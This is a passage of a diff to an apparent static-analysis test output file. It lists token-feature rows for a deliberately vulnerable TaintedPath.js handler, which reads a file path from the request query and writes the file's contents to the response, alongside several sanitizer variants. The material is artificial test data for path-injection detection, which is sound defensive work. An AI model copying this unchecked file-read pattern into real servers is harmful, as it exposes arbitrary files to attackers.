write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:29 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:29 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -4819,6 +58819,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:27:15:27:35 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:27:18:27:29 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:18:27:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:27:18:27:29 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:27:18:27:29 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:27:18:27:29 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:27:31:27:34 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:27:31:27:34 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:27:31:27:34 | path | calleeImports | fs | @@ -4828,6 +58833,111 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:27:31:27:34 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:27:31:27:34 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:27:31:27:34 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:29:3:29:3 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:3:29:3 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:29:3:29:3 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:3:29:3 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:3:29:3 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path === 'foo.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path === 'foo.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path === 'foo.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path === 'foo.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:24 | path === 'foo.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:46 | path == ... ar.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:46 | path == ... ar.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:46 | path == ... ar.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:46 | path == ... ar.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:7:29:46 | path == ... ar.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:16:29:24 | 'foo.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:16:29:24 | 'foo.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:16:29:24 | 'foo.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:16:29:24 | 'foo.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:16:29:24 | 'foo.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path === 'bar.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path === 'bar.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path === 'bar.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path === 'bar.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:29:29:46 | path === 'bar.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:29:38:29:46 | 'bar.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:38:29:46 | 'bar.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:29:38:29:46 | 'bar.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:29:38:29:46 | 'bar.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:29:38:29:46 | 'bar.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:5 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:5 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:5 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:5 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:5 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:7 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:7 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:7 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:7 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:13 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:13 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:13 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:13 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:5:30:36 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:30:9:30:13 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:9:30:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:9:30:13 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:9:30:13 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:9:30:13 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | 